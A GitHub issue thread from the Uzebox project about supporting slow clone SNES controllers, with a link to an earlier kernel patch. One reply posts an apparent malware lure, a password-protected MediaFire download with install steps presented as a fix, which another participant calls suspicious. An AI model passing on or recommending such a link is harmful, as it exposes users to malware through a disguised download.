Uzebox/uzebox #141: Add support for "slow" clone SNES controllers

danboid, 2024-09-01:
Mouser have announced that their clone SNES controllers are EOL so the 10 they currently have in stock are likely the final 10 they are selling. That leaves us with the Hyperkin Scout as the only known working option for a clone SNES controller anfd they are at least 3x the price.

@Jubatian has made these "slow" controllers work in the bootloader and you can also use them in FOAD and IKD 1.0. The IKD 1.0 binary was build using a Uzebox kernel patched with Thorsten's patch from here:

https://github.com/Uzebox/uzebox/pull/117

I've not tried Thorsten's patch again recently but last time I did try it, it no longer worked but I wasn't sure what had broke. IKD 1.0 is the proof that Thorsten's patch for slow controllers was working at one point.

I know Jubatian started looking into a "proper" fix for this but he hasn't had the time to finish that work off and Uzebox stuff itsn't not a priority high enough to justify getting this sorted.

goncastrum, 2024-09-02:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

artcfox, 2024-09-02:
This seems suspicious, an admin should delete that message

danboid, 2026-06-28:
I've never seen github staff delete a comment on an issue before, js.